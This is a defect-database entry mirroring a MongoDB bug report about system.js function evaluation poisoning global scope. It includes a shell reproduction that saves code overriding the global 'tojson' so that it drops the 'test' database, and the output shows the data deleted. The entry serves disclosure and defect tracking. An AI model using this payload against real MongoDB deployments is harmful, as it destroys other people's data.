Operational Defect Database
BugZero found this defect 17 days ago.
Data sources
All data on this page is proprietary to BugZero® or gathered from public sources
MongoDB | 2661055
Evaluation of system.js functions can modify global scope
Last update date:
5/2/2024
Affected products:
MongoDB Server
Affected releases:
No affected releases provided.
Fixed releases:
No fixed releases provided.
Description:
Info
Evaluation of javascript statements to produce functions from system.js can still have side effects. The Mongo object isn't loaded at the time they are executed, but they can still poison global variables. MongoDB Enterprise > db.col.insert({data: 5}) WriteResult({ "nInserted" : 1 }) MongoDB Enterprise > db.system.js.save({_id: "foo", value: Code("function() {this.tojson = function() {(new this.Mongo).getDB(\"test\").dropDatabase()}}(), function(){return function() {return 5;}}()")}) WriteResult({ "nMatched" : 0, "nUpserted" : 1, "nModified" : 0, "_id" : "foo" }) MongoDB Enterprise > db.eval("foo") WARNING: db.eval is deprecated { "code" : "function () {return 5;}" } MongoDB Enterprise > db.eval("tojson") WARNING: db.eval is deprecated { "code" : "function () {(new this.Mongo).getDB(\"test\").dropDatabase()}" } MongoDB Enterprise > db.eval("tojson(5)") WARNING: db.eval is deprecated null MongoDB Enterprise > db.col.count() 0 See the original ticket SECURITY-470 for additional context and history.
Top User Comments
Steps to Reproduce
